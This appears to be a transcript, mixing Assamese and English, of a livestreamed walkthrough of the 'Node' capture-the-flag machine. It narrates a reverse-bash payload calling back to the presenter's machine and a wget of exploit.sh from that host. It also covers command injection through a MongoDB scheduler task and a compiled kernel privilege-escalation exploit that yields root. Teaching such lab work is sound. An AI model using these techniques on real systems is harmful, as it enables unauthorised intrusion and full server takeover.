আমি yes, systemctl start htt নহয়, ইয়াতে হ'ব apache 2. Okay, now just check this out. ইয়াতে মই যাম cd slash var slash temp okay বা কেতিয়াবা cd temp বুলিও থাকে sorry slash temp দিলেও হৈ যায় কেতিয়াবা cd slash var slash temp দিলেও হ'ব guys মই অলপ কি কৈ আছো I'm sorry but again solving it from the scratch is kind of not the easiest thing in the world okay so আমি কোড আছো এতিয়া আমি আছো var slash temp ইয়াতে কিবা কিবি আছে okay so ইয়াতে মই কৰিম wget okay and http 192.168.1.144 এটো হল মোৰ IP address to okay মোৰ নিজৰ মেচিনৰ IP address মই মোৰ victim মেচিনৰ পৰা আনি আছো okay hello Mali hope you are well /exploit.sh enter marim saved okay etu download korle can you see it downloaded it from here to here amar victim machine tot ami amar exploit to ani lolo okay edia ami jam yate msf console start kori lao I'll just quickly check what was the name of the it was tasks okay msf console korilo use exploit /multi/handler okay so even if you are not able to understand some things if you just replicate it and you solve it once more then you will actually be able to understand it really well very easily okay so ami etia linux we are hacking a linux machine for the first time here okay hedu karone ami linux or eta malware banaisu junto naam ami disu exploit.sh okay bash this is a bash script ba shell script boli koy shell script to amar see yate etia etu ahi gol no eta ami download korilo amar ei machine tor pora from one machine to another machine we have from this machine to this machine we have brought the exploit okay and now set payload cmd/unix/reverse bash was this the one that I used okay yeah cmd/unix/reverse bash okay set payload edu korilo hodai show options koribo lage see so set l host 192.168.1.144 okay and set l port 1337 hackers number enter by the way guys thank you so much for joining to all of you who have been joining who have been online since the very beginning I promise you are about to learn something really nice so ako ami korim show options hodai eto ebar check kori lobo lage because timer pabandi e thakibo hodai ctf ot okay and then ami eto korim run ba exploit korim eto reverse tcp handler to yate soli goise eta ami just yate eto solale hobo okay kintu eto ami solabo noaro karon amar permission nai solabo karone so amak solai dibo eto Tomet আর প্লাস actually to be honest আমি চলাব পাৰো কিন্তু আমি মার্কতে আকো access to পাম যোনটো পাই লাভ নাই ন আমাৰ because we do not need access to the mark user we already have it okay we already have access to the username mark we need access to tom okay so আমি এটো আনি ললো ইয়ালৈ okay okay তাৰ পিছত do you remember okay so I'll show you something really awesome okay so yate eto je asse we'll copy this okay so I'm doing something which is completely unorthodox when it comes to solving CTFs okay so maybe you are not going to get marks if you do this thing but I just want to see as a enake korile solve hoy niki so I have this tool known as mongo compass community okay you can download it from the mongodb website okay this is not a hacking tool this is just database administration tool and yate moi korim eto paste hobone paste okay hoy gol খালি ইয়াতে মই লোকেল হোষ্টৰ জাগাত মই মোৰ ভিক্টিম মেচিনটোৰ আইপি এড্ৰেছ দিম 168.1.150 অ'কে ইয়াতে জাষ্ট এইটো পেষ্ট কৰিছোঁ বেলেগ একো কৰা নাই দিছ ইজ নাথিং ডিফিকাল্ট এইটো আমি কপি কৰিছোঁ যোনটো scheduler app.js আছিলে আমি ইয়াতে পেষ্ট কৰিছোঁ এণ্ড আমি কানেক্ট কৰিছোঁ অ'কে আই এম ইউজিং দিছ টু শ্ব' ইউ ভিজুৱেলি হাউ দ্য ডাটাবেছ ইজ ৱৰ্কিং আই ৰিয়েলি হোপ যে এইটো চলিব okay maybe I don't know was it 150 was the IP address 150 it was 150 right yeah it is 150 so 192.168.1.150 connection timed out okay so it won't work like this okay I really was hoping that this would work because it would both I could have shown you everything that is a lot of noise chalo koi baat nahi sorry guys it no solile our kotha nahi okay eko nahi we have one more solution nothing to worry about ami yate olob agote eto olaisilo no ha kaha pe ha this one we'll use this one okay we'll use db.collection.insert1 okay tar agote ami korim mongo minus u mark minus p will copy the password from this one copy and paste bus I think and we need the name of the database okay I mean we actually need the name of the database as well so database to naam to ekdom last or likha thake and auth source equal to scheduler so this is the name of the database okay ekdom last or jonto word hoy so eto ami copy korim eto ami paste korim simple hai na simple very simple okay and ami korim etia enter see we have connected to the database okay and all we need to do is copy this db.collection.insert1 copy paste and insert one ot ami koribo lagibo do you want to see the code once more I'll show you the code once more this was the code no tar bhitor documentor bhitorot cmd asile cmd bhitorot jonto value thwa ase hetu execute kori ase okay cmd bhitoror value to execute kori ase hi just remember this thing once more cmd amar database or bhitorot tasks buli ekhon ase collection task buli eta collection ase he collection tur bhitorot jonto cmd rakha ase cmd er value hoy okay cmd buli eta variable ase he variable tur bhitorot jonto value ase he value to execute koribo every 30 seconds that was okay I'll say it once more database ase scheduler buli database ase amar okay scheduler namor database to bhitorot tasks namor eta collection ase ar he tasks collection tor bhitorot eta cmd buli variable or bhitorot amar eta command ami eta enter korim junto 30 seconds or mure execute kori thakibo hi bare okay so ami ki korim yate ami dim cmd colon I think see if you remember if you just look at this once you'll understand that this is very similar to what we are doing here ami enake start korisu no okay so that's what we are trying to do here so ami cmd dilu and ami dim so to run a shell script okay ami / dibo paru okay ba ami bash ঠিক আছে bash /var/ code hoisilo temp okay /exploit.sh okay and ami last eto jodi semicolon to jodi nidiu amar yate error ahi jabo so just look at this eto tcp handler to sola ase no so eto jetia ami kori dim ami enter mari dim yate no acknowledge true ahi gol amar yate see and within 30 seconds I think we'll get 30 seconds of more jehetu execute hoy ase we might be able to get the shell within the next 10 to 20 seconds, I hope. Did we do it correctly? We might not have done it correct. We might have missed one thing though. Let's just wait for 10 more seconds, right? I know this is a bit difficult, but just try it once more. Plus, I will give you the best way to get the answer to this one. Okay, you will get the you can either watch this video and do it along me, or what you can do is you can just, I'll give you a link where the entire thing is written down. Okay, screenshot or logot. Okay, explain kori thoda ase. Okay guys, obviously ami eta bhul korisu, and I think I know what the mistake is. It is the ls minus l maro yate saba eto executable permission dia nai. Okay, বেছি একো ভাবিব নালাগে ইয়াতে x এটা আহিব লাগে ইয়াতে যেনেকৈ x এটা আছে ইয়াতে x টো নে আমি x টো আনিলাম ন সো chmod plus x exploit.sh এটা সবা ls minus l যেতিয়া মাৰিম ইয়াতে x কেটা আহি গল সো আকৌ আমি এটা কাম কৰিম এইটোৱে কপি কৰিম copy selection paste selection enter এটো আহি গল আকৌ এটো আমি কৰিম copy and paste please হৈ যাবি এবাৰ okay ইয়াতে আছে এটো কৰিম enter okay and ইয়াতে within again 30 seconds or ভিতৰত hopefully it will if it doesn't work I'll just lose my If this doesn't work, I'll hack it in a really bad way, but I will hack it no matter what. There is a way that I can get this no matter what. Okay, but that is not the way. And I really don't want to go that way. But it's not happening for some reason. Okay, this did not happen. I'll just do one thing, cat exploit.sh Marisa. This seems to be correct. Okay, this seems to be pretty much the thing that should have worked. Let me just check the command minus p cmd unix reverse bash l host 1.144 l port 1337 minus f raw jonto ami eta file khumai disu exploit.sh thik ase then ami heto tate loi golo and loi ami apache 2d msf console khulilo msf console khuli pelai what we have done is set payload cmd unix reverse bash, which seems to be correct. Exploit multi-handler set payload set show options dekhale ami humalo l host jonto amar ip address 144 asile ne yeah 144 hoy so l port tapisot set l port 1337 show options and then we start a reverse TCP handler. Okay, this seems to be correct though. Okay, no problem. pwt ls okay guys, anyone with the solution, I would love some help at this point. But yeah, I will solve it somehow, don't worry. And I do have a very dirty trick up my sleeve. should we just try this same thing once more? I'll just give this one more last try. Okay. I'll just paste selection, and after that এটা এবাৰ নতুনকৈ টাইপ কৰিলোঁ dp. Oh yes guys, such a silly mistake. This is the worst mistake that you can make. See, ফাইল মই আকবাৰ টাইপ কৰিব ওলাইছিলোঁ, ইয়াতে মই db.collection দিছিলোঁ ন, বাট আমাৰ কালেকশ্যনটোৰ নাম কালেকশ্যন নহয়, ইট ৱাজ টাস্কছ. অ'কে, সেইটো কাৰণে আমাৰ ইয়াতে অহা নাই ন, এতিয়া ষ্টাৰ্টেড হেণ্ডলাৰতে ৰৈ আছেহি. চ' db.tasks dot insert one cmd bash / var / tmp / dot sh. okay, and আমি কৰিম এইটো বন্ধ and জেমাতা দি enter. এটা কিবা আহিবনে? আমি এবাৰ আকৌ এক্সেক্টলি চেম দিছিলোঁ নে? Come on man. db.tasks.insert one cmd bash / var / tem / exploit.sh. This is really, oh wait, okay, this actually took time, but it opened guys. Oh my god. Okay. That was really dramatic. Okay, like dug moment. Okay, but in all seriousness, okay, so it seems like আমি shell পাই গৈছো, so like pwd যদি দিও আমি, so আমি rootত আছো ন. Who am I? Tom. We actually have everything now guys. Okay, so আমি কৰিম এইটো exit by okay, so ইয়াতে see. Okay, so who am I? We are Tom right now. Okay, and there was the other command also, no, id. Okay, so we are Tom right now. Okay, we are Tom, we are finally Tom. So do you remember when we were trying to do this cd/home/ tom, and then আমি ls যেতিয়া আমি cat user.txt কৰি আছিলোঁ, পাৰ্মিশ্যন ডিনাইড আহি আছিলে, চেম তো আমি ইয়াতে কৰি চাম and tell me once if it works or not. cd/home/tom pwd where am I? Okay, so ls মাৰিম, user.txt এটা আছে ইয়াতে as usual, and আমি কৰিম cat user.txt. we have our first flag, ladies and gentlemen, and congratulations on getting the first flag. And we'll copy this and we will এইখিনি যোৱা আৰু তুমি হ'ব নালাগে. so ইয়াতে আমি কৰি দিম paste flag 1. okay, we have our first flag here. okay, okay, we have the first flag. okay, congratulations. I think ইয়াৰ পৰা বেছি আমাৰ কষ্ট নহয়. so I'll just come back to mark because ইয়াৰ টাৰ্মিনেলখন এইখনতকৈ বেছি ধুনীয়া লাগিছে. we'll just go to cd/, okay, and I will ls here. see, root user যোনটো হোম ফল্ডাৰ হয় সেইটো হোমত বুলি নাথাকে, ৰুট বুলিয়ে থাকে. okay, so আমি কৰিম cd root. see, permission denied. okay, so it's like সৰুতে এটা আলমাৰি বন্ধ আছে and you have to open it somehow. since it is locked, even though there might nothing be inside, basic curiosity হৈ যায় ন খুলিবৰ কাৰণে. so I'm like more than enough curious what to do, and I need to go into this folder now. okay, so আমি এটা কাম কৰিম, we will just let's find the version of Linux that this server is running. okay, সেইটো কাৰণে এটা বহুত easy command আছে, uname -i linux. okay, this is the version. okay, this is some sort of ubuntu that this but this is the version basically, this is the kernel ka version. Okay, so আমি bas etu korim copy, আমি jam exploitdb.com. Okay, we'll go to exploitdb.com. This is the most awesome website ever, and I'll paste it here and I'll click on enter. Okay, and nothing. Okay, generic to gusai diu. No matches found. Okay, we'll just do one thing. We'll do generic exploits. Okay, yate eta ahise 4.4.0 116 not ke common. So obviously 93 is less than 116. So I think this is something that we can use to hack this one. Okay, eto aise so eto ki hai local privilege escalation. That's what we want. Okay, we are already inside the system. What we want is we want to become the root user. Okay, ami root user hobo lage. Okay, okay, so yate exploit to ase, see yate shell code and all sob ase dhuniya ke rakhi thoa. Okay, dhuniya ke shell code ase. Okay, sorry, something happened, sorry. Okay, so we'll just download this. Okay, download. Okay, save file. Okay, and we'll go to ami to compile korilo. ঠিক আছে, we'll compile this. So ami amar edit ghuri aito nahoy. Let's just come here and let's zoom it for you guys. Okay, so ami eto rakhiso amar downloads, so cd downloads. Okay, and ls. So this is the exploit. Okay, I mean local privilege escalation korim. We have covered everything today, everyone, guys. Okay, we have covered everything today. I mean web application hacking korilo, ami remote access lolo, and ami the local privilege escalation, which is the final step in any situation. We are going to do that. Okay, so ami to ase no, what we will do is eto C file hai. C file ho karone I think most of you already know ki gcc 44 something minus o exploit. Okay, and now we have a file which is known as exploit. Again, what I am going to do is copy exploit to /var www html. Okay, copy permission denied. Chalo koi baat nahi, ami korim eto sudo password di diu. Okay, copy hoy gol, and etia jetia ami ako korim wget http 192.168 are sorry 168.1.150/exploit he kabo permission denied. No problem, ami jam cd/var/tmp. Okay, and ami ako korim a command to copy paste, enter. Connection refused. Aisa kyu? Don't worry, I think I know what the problem is once more. Just basic carelessness. cd/home /var html ls ll marisao exploit to read exploit.sh. Okay, let's just see if it can download the exploit.sh. Copy selection, paste keyboard sh. Okay, to connection refused by yes, no problem. So minus I, control L. I mean, just let's check the Apache. Okay. System control status Apache 2. It's running. Take a second. Is the oh yes, the IP address is wrong, guys. I'm so sorry. It's not 150. This is 144. Okay. See, connecting ho aise kya. Badhiya. No. Oh, again I have made the mistake. 144. Okay, saved. Okay. I got it. Amar. I do exploit asle no. Okay. So let me go ls minus l. See, yate permission nai. Amar executable permission nai. Ako ami ki koribo lage chmod plus x exploit enter and bus simple last step dot slash exploit. See one thing. Yate dollar ase, yate hash ase. Dollar dhaka mane it's a normal standard privilege dhaka user hai. Hash mane we are now root. Okay, we have achieved root, ladies and gentlemen. Welcome to the root. Okay, welcome to the shell. So ami jodi eta koru who am I? Root. Okay, so it means jodi cd slash root koru ami ahi golo permission denied eta nedekhai kono karonete. And ami ls jodi maru, you can see a file which is known as root.txt, and ami jodi eta koru cat root.txt, we have our final flag. Okay, and we'll type 2 and paste it here. Congratulations, we have successfully solved the VM which is known as node, and we only did it in 1 hour and 29 minutes. Welcome everyone and congratulations, and to everyone who has been here until now, thank you very much for watching. And I'm trying to do this at least twice or thrice a week. Let me just see how many times I can do this. So last week we did one. This is the second one. I promise this was a bit more difficult, but I promise in the next episode of our live show we will definitely solve an easier one and hopefully a more interesting one. This was definitely very interesting, no, because we hacked a website, we accessed one of the users that has access to the server of that website, and finally we also have accessed root of that server. Okay, I mean we have now complete access to the server. We can even delete the website if we want to. Okay, so congratulations guys, welcome here. If you have any questions, do comment, and thank you so much for staying on until now. Okay, see you as soon as possible. Happy Bihu.